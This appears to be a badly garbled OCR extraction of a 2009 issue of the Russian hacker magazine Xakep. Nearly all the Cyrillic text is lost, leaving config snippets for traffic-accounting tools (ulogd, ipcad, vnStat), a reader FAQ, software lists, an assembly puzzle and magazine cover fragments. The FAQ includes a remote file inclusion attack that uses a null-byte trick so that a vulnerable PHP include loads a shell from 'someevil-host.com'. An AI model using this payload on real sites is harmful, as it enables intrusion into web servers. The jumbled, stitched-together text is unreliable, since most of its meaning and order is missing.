ulogd-2.0.0beta2, ulogd , . - :
/etc/ulogd.conf. :
$ sudo /etc/init.d/ulogd restart
$ sudo nano /etc/ulogd.conf
$ tail -f /var/log/ulog/syslogemu.log
[global]
,
#
, MySQL,
logfile="/var/log/ulog/ulogd.log"
:
loglevel=5
#
$ mysql -uroot -ppassword
#
> CREATE DATABASE ulogd;
plugin="/usr/lib/ulogd/ulogd_LOGEMU.so"
> GRANT ALL PRIVILEGES ON ulogd.* TO
# MySQL
'user'@'localhost' IDENTIFIED BY 'pass';
#plugin="/usr/lib/ulogd/ulogd_MYSQL.so"
[LOGEMU]
/usr/share/doc/ulogd-mysql -# ( )
mysql.table :
file="/var/log/ulog/syslogemu.log"
# MySQL
$ cat /usr/share/doc/ulogd-mysql/mysql.table |
[MYSQL]
mysql -uuser -ppass ulogd
table="ulog"
pass="pass"
ulogd:
user="user"
db="ulogd"
$ sudo /etc/init.d/ulogd restart
host="localhost"
iptables, ULOG.
:
iptables -A FORWARD $FILTER -j LOG --log-prefix "FORWARD"

128


(select count(*) from ulog;).
, ulogd ,
.
Linux
IP, . X 02 /122/ 09

>> SYN/ACK
ipcad , . , :
$ sudo mkdir -m 700 /var/log/ipcad
$ sudo touch /var/log/ipcad/ipcad.dump
$ sudo chmod 600 /var/log/ipcad/ipcad.dump

(
):
$ sudo ipcad rds

- NiTraf

, :
,
-.

IPCAD
IPCad (Cisco IP accounting simulator, lionet.info/ipcad) , ,
BPF (Berkeley packet filter), libpcap
ULOG. Linux, *BSD,
MacOS X/Darwin Solaris.
Ubuntu , IPCad .
libpcap,
:
$ sudo apt-get install libpcap-dev build-essential linuxlibc-dev

:
$
$
$
$
$

tar xzvf ipcad-3.7.3.tar.gz


cd ipcad-3.7.3
./configure
make
sudo make install

ipcad.conf /usr/local/etc. ,
:
$ sudo nano /usr/local/etc/ipcad.conf
# , (
PPP eth0)
interface ppp*;
interface eth0;
# 192.168.1.0
aggregate 192.168.1.0/24 strip 32;
# 24
aggregate 0.0.0.0/0 strip 24;
# rsh ( )
rsh enable at 127.0.0.1;
#
rsh root@127.0.0.1 admin;
# user
rsh user@127.0.0.1 deny;
#
rsh 127.0.0.1 view-only;
#
dumpfile = /var/log/ipcad/ipcad.dump;
X 02 /122/ 09

, . :
r dumpfile;
d (
);
s
dumpfile.

IPCad
.
/etc/init.d/rc.local ( ).
rsh, ipcad.conf:
$ rsh localhost show ip accounting

. , grep awk. ,
,
:
$rsh$HOSTshowipaccounting|grep-E'192\.168\.1\.'$1'([^09]|$)' | awk '{s+=$4} END {print(s/1024)}'

. , RRDtool (
z_11_2008). :
$ rsh localhost show interface eth0

:
$ rsh localhost dump > /var/log/ipcad/ipcad.'date'

clear ip accounting.
ipcad rsh localhost
shutdown.

VNSTAT
, ,
, . ,

( tcpdump, netwatch, ethereal). - iptables ,
. vnStat (humdi.net/
vnstat), .
Linux, FreeBSD Darwin/MacOS X. :

129

>> SYN/ACK

links
vnStat
humdi.net/vnstat.
NetAcct exorsus.net/
projects/net-acct.

$ sudo aptitude install vnstat

, , , vnstat '--longhelp'. ,
. '-u/--update':
$ sudo vnstat -u -i ppp0
Unable to read database "/var/lib/vnstat/ppp0".
-> A new database has been created.
$ sudo vnstat -u -i eth0

,
/var/lib/vnstat. ,



cnupm (pdp-11.org.ru/~form/cnupm), IP/IPv6- pcap. *BSD,
Linux, QNX, Solaris , , , pcap.
README .
: cnupm cnupmstat.

tcpdump- , ,
chroot ,
.
:

, vnstat ,
/ .
estimated
,
. ,
vnstat .
cron,
, /etc/
network
.
'-i', .
: '-h' , '-d' , '-w'
'-m' . '--dumpdb'
.
.

'-r/--reset' '--disable'.
$ sudo vnstat -i eth0 -u -r --disable

'--live' / .
/etc/vnstat.conf $HOME/.vnstatrc.
,
, '--showconfig', :
$ sudo sh -c "vnstat --showconfig > /etc/vnstat.
conf"

$ sudo /usr/local/sbin/cnupm -N -f inet -k -q -p -D -i eth0

cnupmstat eth0.
stb.nixdev.org - stb (simple traffic
billing).

130

CGI-
vnstati,
. (www.sqweek.com/sqweek/
index.php?p=1) PHP -. z
X 02 /122/ 09

>> units
MEHOVUSHKA
/ MEHOVUSHECHKA@YANDEX.RU /

PSYCHO:

:
, , , , , , .
, , ,
.

, , ,
.
,
,
, .
. , , ,
, , , ,
. - !
, , ,
, ,
. , ,
.
,
, . , , , livejournal, , ,
,
. , , ,
- .
!
,
.
, , :
9- . . , ,
, ,
.
, .
, ,
. ,
, - ,
. . ,
, ?
,
, -

132

.
, ,
. , ,
.


z
. , :
;
, , , ;
(
, ,
, ; ,
, );
( ,
, );
.

? , ,
. ,
, , . , ,
-. ,
! , ,
-.
,
.

. ,
, , /SQL-.
, ,
X 02 /122/ 09

>> units

!
.. , , , .
, . ,
?
, ? ,
, ,
,
. ,
.
. ,
,
. ,
X 02 /122/ 09

. ,
, (
) -. ? - ,
,
.
,
, .
.


, , ,
,
. 50% , -

133

>> units

, -
.

50% . 10%
, .
, ,
.
-, ,
,
. , .
.
: .
! . ,
, , ,
, ,
. ,
, .
, : , , ,

, , , ,
.
,
.
, , :
, , ,
.

134



(, ,
- ).
, , ,
.

,
,
,
,
,

. ,
- , -,
.
, .
.
,
, , ,
, . ,
.


. ,
Psycho , , . ,
,
, ,
.
, - .
, : ,

. , .
, ,
.
: . ,
X 02 /122/ 09

>> units

PR-

, ? :)

,
. , ,
. , , -
. .

( ),
,
, , , , , .
,
.
, . .


. , ,
, NASA.
, , .
, , ,
, .
. -
. ,
, , .
. , , ,
.
X 02 /122/ 09


,
, - .
.
.
, ,
, , , icq ,
. ,
.
,
: .
.
? , , ,
. ,
, ,
. : -
, : ,
,
. ,
, ( 3-
). ,
, ,
, .
, ,
.
, - , :
,
,
. , ,
-. , , ,
,

.

, ,
, ,
. ,
, . , .
,
. z

135

>> units

/ ICQ 884888 /

FAQ UNITED:

Q: - IE
SMS -. ?
A: IE IE :).
, : IE

.
dll nhslib.dll (,
) .
nhslib.dll .

Dr.Web CureIt. !
Q: ICQ-.
?
A: ICQ UIN #1
#7777777? :) !
IServerd
(http://iserverd.khstu.ru/russian).

136

:
, Mirabilis ICQ (
I Seek You ).
,

. ICQ- ,
, .
,

ICQ-. beta ICQ- .
Mirabilis
AOL, .
,
.
gicqd (GNU icq
daemon), . gicqd
, IServerd.



PostgreSQL RDBMS. (
, , , , )
. ,

IServerd. V3G ( ,
V3 Groupware),V5, V7.
: ICQCorp, ICQ99a, ICQ99b, CenterICQ,
MirandaICQ, Licq, micq, ICQ2000a, ICQ2000b.
ICQ2001, ICQ2002, ICQ2003, ICQLite.
? ICQ-
*nix- , Postgresql , Ncurses , ,
IServerd.
.
http://icqwarez.ru/
X 02 /122/ 09

>> units

svoj-server-pod-icq-legko-ili-net,
IServerd .
Q: , http://some-site.
com - .
?
A:
Gh0s7 Pelmeshko HEAD Scaner (http://forum.
antichat.ru/thread40031.html). ,
.
:
HEAD , ;
Header anazyler , Server, X-PoweredBy .;
404 probe request ,
(200,302,401, etc.)
, 404, 302 , ,
200(OK);
,

;
https cookies.
:
./hscan.pl http://some-site.com/.
Q: SMS-, .
A: , .
:
1. partners.i-free.ru
2. www.mobilmoney.ru
3. mobilcent.ru
4. www.a1agregator.ru
5. www.agregator.ru
6. smscoin.com
7. rocketbill.ru
8. cmcbilling.ru
9. www.smsexpress.ru
10. www.billingsms.ru
11. www.smsoff.ru
12. www.smsrent.ru
X 02 /122/ 09

13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.

www.smsdostup.ru
payweb.ru
nanobilling.com
gsm-inform.ru
b2m.ru
geopay.ru
smstraffic.ru
www.smsrate.ru
smsonline.ru
smspay.us
openbill.ru
banksms.ru
www.e-commers.ru

:
1. www.glpayment.co.uk
2. www.tribaltext.com
3. www.premiumsmsusa.com
4. www.smstoday.co.uk
5. www.mblox.com
6. www.m-bill.net
7. www.animatele.com
8. www.tailormade.se
9. www.clickatell.com
10. www.truesenses.com
11. www.stealthnet.net
12. sms.vianett.com
13. www.nocreditcard.com
14. www.daopay.com
15. www.global-acces.com
16. www.123ticket.com
http://allpublication.ru/sms/, ,
.
,

.
, ,
..
Q: !!! ! ,

?
A: , ! , Java-, , .
,

. !

,
?
( , , ) - http://
ru.numberempire.com/integralcalculator.php.
? , ,
, ,
L, ,
( , ,
, , ,
).
,
()

:
: +, -, *, /, ^, sqrt, exp,
log, erf, abs, sin, cos, sec, csc,
tan, cot, asin, acos, asec, acsc,
atan, acot
sinh, cosh, sech, csch, tanh, coth,
asinh, acosh, asech, acsch, atanh,
acoth.
: %e , %pi ?, inf
infinity.
Q: -
: <?php include($_
GET[filename]..php); ?>.

, .php?
A: ! %00, ,

. :
index.php?filename=http://someevil-host.com/shell.txt?
, :
<?php
include('http://some-evilhost.com/shell.txt?.php'); ?>

137

>> units

, .php,
QUERY_STRING,
. ,
allow_url_fopen, shell.txt.
Q: ,
!
SMS?
A: , 2 .
-,
:
http://ultrex.ru
http://exsms.ru
http://dengisms.ru
http://wm.allsms.info
http://www.elecpay.ru
http://www.wmsms.ru
http://www.wm-sms.ru
http://goldsms.info
http://v-money.ru
http://smscoin.com
https://www.megaobmen.ru
http://roboxchange.com

,
.
? , , SMS 1$ + 12.85 WMR.
? ,
.
Q:
Windows .
, ,
?
A: tree.exe,
.
.
:
c:\Work\xa_10\files\soft\Windows\
Dailysoft>tree

: 7866-BD90
C:.
|-7-Zip 4.57
|-7-Zip (64-bit) 4.58
|-AutoRuns 9.34
|-DAEMON Tools Lite 4.30.1
|--64-
|-Download Master 5.5.6.1139
|-FarPowerPack 1.15
|-FileZilla 3.1.3
|-IrfanView 4.2
|--
|-JDataSaver

138

Q: Level-UP .
, ( ASUS,
).
?
?
A: , . ,

,
(). ,
, BroadCom/
Atheros/Xscale/PowerPC,
Linksys. ,
: ,
Linux.
DD-WRT (dd-wrt.com), Tomato (www.
polarcloud.com/tomato), Openwrt (openwrt.org),
Oleg firmware (oleg.wl500g.info). ,
,
ASUS. Openwrt
,
linux-,
. , ,
.
,
. , Tomato
,
Ajax.
?

, .
, (
).
.

wrt.com/wiki/index.php/Supported_Devices.
, : Frequency ( ), RAM
( ), Flash Memory
( ),WLAN
standard ( Wi-fi).
,
.
USB-: ,
print- ( ,
torrent-,
).

Q:
XAMPP LAMP- ( ,
!
. Step).
-
Microsoft?
A: !
- .

-,
, SDK .
- IIS 7 ()
FastCGI, .NET Framework 3.5 ASP.
NET MVC
-.
, , SQL
Express 2008.
, . ,
#/Visual Basic
.
,
Web Developer Express,

Silverlight. ,
-
,

!
!
Q:
?
A: Windows Vista :
.
:
MKLINK [[/D] | [/H] | [/J]] <
> <>
/D .

/H .
/J - ( ).
< > .
<> ( ),
.

, GUI-
Link Shell Extension (http://schinagl.priv.
at/nt/hardlinkshellext/hardlinkshellext.
html). z
X 02 /122/ 09

>Net
Alchemy Network Monitor 9.8
AdSweep v.0.4
FreeOTFE 4.50
Google Sitemap Generator

>Multimedia
AutoGK (Auto Gordian Knot) 2.55
Desktop Earth 2.0.1
Google Earth for Windows 5.0
Songsmith 1.01
Stellarium for Windows 0.10.1
ooVoo for Windows 2.0.0.86
FinePrint 6.06
Audacity for Windows 1.3.7 Beta
Floola for Windows 4.7
ProgDVB 6.04
foobar2000 0.9.6.2

>Misc
ArsClip 3.1.2
Everything 1.1.4.301
Impressive 0.10.2
LastPass 1.44
Launchy 2.1.2
StandaloneStack 1.0
Taksi 0.7.6
Windows File Analyzer
Windows Registry Recovery
XMind 3.0.1
Polyglot 3000 3.32

>Games
Teeworlds 0.5.1

>Development
All-In-One PDT 2.0
ASP.NET MVC Release Candidate 1
Microsoft SQL Server 2008
WinMerge 2.13.2
Ruby 1.9.1
SQLyog for Windows 8.0

>>WINDOWS
>Dailysoft
7-Zip 4.65
AutoRuns 9.35
DAEMON Tools Lite 4.30.1
Download Master 5.5.9.1155
FarPowerPack 1.15
FileZilla Client 3.2.0
IrfanView 4.23
JDataSaver
K-Lite Mega Codec Pack 4.4.2
Miranda IM 0.7.13
Mozilla Firefox 3.0.5
Notepad++ 5.1.3
Opera 9.63
PuTTY 0.60
QIP Infium
Skype stable
Total Commander 7.04a
Unlocker 1.8.7
Winamp Media Player 5.5
Xakep CD DataSaver 5.2

>UNIX
>Desktop
Alexandria 0.6.3
Audacious 1.5.1
Banshee 1.4.2
BMPx 0.40.14
cdrtools 2.01
ChmSee 1.0.3
Google blog converters 1.0
gscan2pdf 0.9.27
KDE 4.2
LabPlot 1.6.0.2
LMMS 0.4.2
Misfit Model 3d 1.2.4
Nemo 0.2.3
Photorec 6.10
Picasa 3.0b
QTuneroid 0.9
Skencil 0.6.17
SuperKaramba 0.39
TDFSB 0.0.10
TuxGuitar 1.0
w32codec-all 20071007
WCD 4.1.0
Xara LX Xtreme 0.7
Xplanet 1.2.0
iPod - Avi 2 iPOD (mp4)
2.1.3
iPod - Convert 2 Video MP4
(iPod & PSP) 1.0
iPod - Floola 4.7
iPod - FUSEPod 0.5.2
iPod - GPixPod 0.6.2
iPod - Gtkpod 0.99.14

>System
AutoHotkey 1.0.47.06
Bonkey 3.2.0
Comodo Backup 1.0.4.337
DriverMax 4.9
Directory Opus 9.1
DriveLook 1.00
Folder Lock 6.1.4
Fport v2.0
nHancer 2.4.5
Frhed 1.3.10 Beta
NVIDIA BIOS Editor (NiBiTor) 4.8
Memtest86 3.5
MDaemon 10.0.4
PeaZip for Windows 2.5
Returnil Virtual System 2.0
TaggedFrog 0.6
ThreatFire 4.0.0
Jetico Personal Firewall 2.1.0.1
Beta
QT TabBar 1.2.3 Beta 5
WinDirStat 1.1.2

Google Chrome 2.0.159.0


glu 1.0 Beta 4
NetworkMiner 0.87
FAROO 2.0.3316.32622 Beta
Xobni
Website-Watcher 5.0.1
VisualRoute 2008 for Windows 13.0a

>Security
Aide 0.13.1
Aircrack-ng 1.0rc2
avast! Linux Home Edition 1.0.8
Bastille 3.2.1
Cryptkeeper 0.9.4
EncFS 1.5.0

>Net
Apollon 1.0.2.1
Deluge 1.1.1
Eggdrop 1.6.19
GMPC 0.17.0
Kasablanca 0.4.0.2
KGmailNotifier 0.4.0
KMLDonkey 0.11
Konversation 1.1
Midori 0.1.1
MLdonkey 2.9.7
Mozilla Firefox 3.1 Beta 2
NCFTP 3.2.2
Opera 10a
Rdesktop 1.6.0
ttcp
WebIssues Client 0.9.3
x11vnc 0.9.6

>Games
SuperTuxKart 0.6
Teeworlds 0.5.0

>Development
Allegro 4.9.7.1
Anjuta IDE 2.24.2
Boo 0.9
CodeLite 1.0.2674
Eclipse Air Plugin
Eclipse CDT 5.0.1
Eclipse PDT 2.0
Geany 0.15
Google Sitemap Generator
JSCoverage 0.4
KScope 1.9.1
Lazarus 0.9.26
libgpod 0.7.0
libmcrypt 2.5.7
Mono 2.2
MonoDevelop 2.0 Alpha 2
PLT Scheme 4.1.4
PyPE 2.8.8
SDL 1.2.13
Spring Framework 3.0.0.M1
Spring IDE for Eclipse 2.0.1
Taffy 0.57
Ultimate++ 2008.1
X# 1.0

iPod - Hipo 0.6.1


iPod - iPod Video Encoder
1.0.2
iPod - KAddressBook to
iPod Synchronisation 1.0
iPod - Linux on iPod
iPod - SyncPOD 0.68
iPod - Transfer to iPod 0.8

>System
BlueProximity 1.2.5
bonnie++ 1.03e
CDfs 2.6.27
Crossroads Load Balancer 2.41
Kernel 2.6.28.2
KleanSweep 0.2.9
Linuxconf 1.35r1
Nixstaller 0.4
NTFS-3G 2009.1.1
Phoronix Test Suite 1.6.0
Portable Linux 0.9.3
Rally 0.4.93
rlocate 0.5.6
StoreBackup 3.0rc1
Zero Install Injector 0.38

>Server
Amavisd-new 2.6.2
Bind 9.6.0
Cherokee 0.98
Courier-imap 4.4.1
Dillo 2.0
Dovecot 1.1.10
Ejabberd 2.0.3
Freeradius 2.1.3
Mail Avenger 0.7.9
Music Player Daemon 0.14.1
MySQL 6.0.9 Alpha
NSD 3.2.1
Nut 2.4.0
OpenCA PKI v1.0.2
Openfire 3.6.3
Pure-ftpd 1.0.21
Samba 3.3.0
Socks Server 5
Vatata RTSP server 1.0.0 Beta
VerliHub 0.9.8d RC2
Vsftpd 2.0.7
WebIssues Server 0.8.3-2

ike-scan 1.9
K-EncFS 2.1
Kismet 2008-05-R1
Metasploit Framework 3.2
Motion 3.2.8
Open Source Tripwire 2.4.1.2
Paros 3.2.13
Portsentry 1.2
PWGen 2.06
SmoothWall Express 3.0 SP1
Sussen 0.90

x 02(122) 2009
. 46


CMS

. 90

PYTHON 3000
NETCAT

. 42

02 (122) 2009

. 28

. 126


*NIX

w w w.xakep.ru

DOWNADUP: 10 000 000 4

2100 .

( 15%
)

. ,

( ) 3-
.
5(4

]]




AMD PHENOM II:

08021

GRAND
THEFT
AUTO

>



31(



80-'&/45&*/




HTC:

08

+CD

touch- Windows Mobile 76

, LAS VEGAS SANDS: .

ASUS

: -2108
3S-GTE

www.mconline.ru

30

28
26
Archos
5

44

S101

Samsung
GT-i8510

Lenovo
S10

:
!

66

Toshiba
R600

2008

: Canon PowerShot A2000 IS Nikon COOLPIX S710 Nikon D700 Olympus mju 1040
Panasonic Lumix DMC-LX3 Pentax Optio M60 Sony Cyber-shot DSC-T700

1980 12

02

?
!

2009

,
,

20

| 2008 | 11 (32)

www.maxi-tuning.ru


www.totalfootball.ru

37

46

36
EXPLAY
PN-430

DVDXpert
?

48

. 62

30

&sexy

50
120 000

. 28

Nikon
D700

Erdinger

17

+
=

38

IntelAtom

22

$2

70

84

SLI Crossfire

12 (51) /2008

www.mconline.ru

LCD

BOSE

12 2008

Reference Video System

!
.

2009


(98)

Meridian 810

w w w. m y b i z . r u

GPS-

12[52] 08

12

WI-FI DRAFT N

AV-

20 000

DRAFT N

DIABLO III





CALL
OF DUTY:
WORLD
AT WAR

>

$0.."/%
$0/26&3
3&%"-&35

7"-,:3*"
$)30/*$-&4

WRATH
OF THE
LICH KING

02 (60) 2009

IV

C A L L O F D U T Y: WO R L D AT WA R

 .1"35:
"1$0

> DIABLO III > MAFIA II >


%7%


52

SKYPE

W R AT H O F T H E L I C H K I N G




G TA I V

#BZPOFUUB

038-062

DVD

>

1$14148**9#09%4141

Total DVD

30 ,
31 .
31

#02|60|2009
:
, ,
,

WWW.PC-GAMER.RU
W
W W.P C- GA ME R RU

> > 2009 > 01 (77)

2009

K E F 5

11 (92) 2008

]]]] 

,

, :

1994

 
A

RUSSIAN EDITION #01 (37) 2009

, .

VW Caddy

Honda Prelude

Toyota Celica

-2108

Subaru Impreza

Maxi tuning

ONBOARD

Total Football

! !

DVD + DVD:
- 155
( 25% , )

UIN C TJAT.COM

AMD PHENOM II:

. 64

#02|60|2009
:
, ,
,

038-062

w w w.xakep.ru

12 (120) 2008

SKYPE

WI-FI DRAFT N

52
A

DRAFT N

. 50

2100

RunCMS

. 22

WWW.XARD.RU

WEB-


WEB 2.0
. 20

AJAX

AJAX-
. 98

iPHONE


SDK
. 88

DVD

3720

02 (60) 2009

12

. 22

WWW.XARD.RU

4 607157 100056

Total DVD 92 2008

20 XXI

!
.
LCD

SLI Crossfire

IntelAtom


1. , ,
www.glc.ru.
2. .
3. :
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,

. , . 11, . 44,
, .


:
;
20
.
,
.
,
. , , .

+DVD 6 1200 .
, , 8(495)780-88-29 ( )
8(800)200-3-999 ( , , ).
info@glc.ru www.GLC.ru

>> units

/ XPUZZLE@REAL.XAKEP.RU,
WWW.SKLYAROFF.RU /

X-PUZZLE:

!
, . ,
, . :
, .


X-PUZZLE:

<< >>

<< >>

( ,
) 2Dh 17h.
hatelove.com (
):

int 21h
int 20h
Mess2 db Nkhqb#

Xorer proc
CSEG segment
assume CS:CSEG,
DS:CSEG,ES:CSEG,SS:CSEG
org 100h

Begin:
mov bx,offset Mess1
push bx
call Xorer
pop
mov
mov
int

bx
ah,9
dx,bx
21h

mov ah,9
mov dx,offset Mess3

142

:
57;
AND;
XOR;
OR;
XOR.

mov cx,8
Hi:
mov
xor
mov
inc

ax,[bx]
ax,7
[bx],ax
bx

loop Hi
ret
Xorer endp
Mess1 db Nofsb#
Mess3 db ][akep!$
CSEG ends

<< >>

: .
ASCII- . , ASCII- 6h
, .

<< >>

. main : if
(argc != 3). , ,
argv[2] argv[3], argc , ,
4 ( argv[0] argv[3]). ,
: if (argc != 4).
. fopen,
fdout, (rb),
fwrite .
fopen, fdin,
(wb), fread .
, rb wb fopen
.
. Windows- CreateFile
( 7).
X 02 /122/ 09

>> units
WINDOWS

. 64

. 42

UIN C TJAT.COM

w w w.xakep.ru
11 (119) 2008

09 (117) 2008

Rustok.C

Imagine
Cup 2008

.32

. 58

MACOS X
. 62

ULTIMATE-
PHP
. 58

. 64

w w w.xakep.ru
12 (120) 2008

RunCMS

. 50

. 122

ICQ
. 74

HTTP

,
-

. 38

GOOGLE
TALK

IM-
GOOGLE
. 44

WEB-

DNS


DNS-
. 94


WEB 2.0
. 20

. 24


PLAYSTATION

. 28

AJAX

AJAX-

iPHONE


SDK
. 88

. 98

zakovirka.exe.
zakovirka.exe
www.sklyaroff.ru.

:

, :
,

, .
, . ,
, .

.
.
.
loop $
push cx
not dx
not cx
or dx,cx
xor dx,0ffffh
mov bx,dx
or cx,bx
and ax,bx
xor ax,0ffffh
and cx,ax
pop cx
mov ax,cx

X 02 /122/ 09

143

http://

2
WWW2

DUMPZ.ORG
HTTP://DUMPZ.ORG

TORRENT-

BARATRO.RU
HTTP://BARATRO.RU

,
. , , -, , , -,
.
- . ,
, .
, ,
.
, ,
!

GIZMOCALL
HTTPS://WWW.GIZMOCALL.COM ZYB.COM
, ,
HTTP://ZYB.COM
, . Skype
, portable-
. -
Gizmo, .
Flash
9 .

144

, ( , , ).
, ,
. , ,
SMS . , :
! :)

X 02 /122/ 09

>> inside

/ STEP@GAMELAND. RU/

X 11 /107/ 07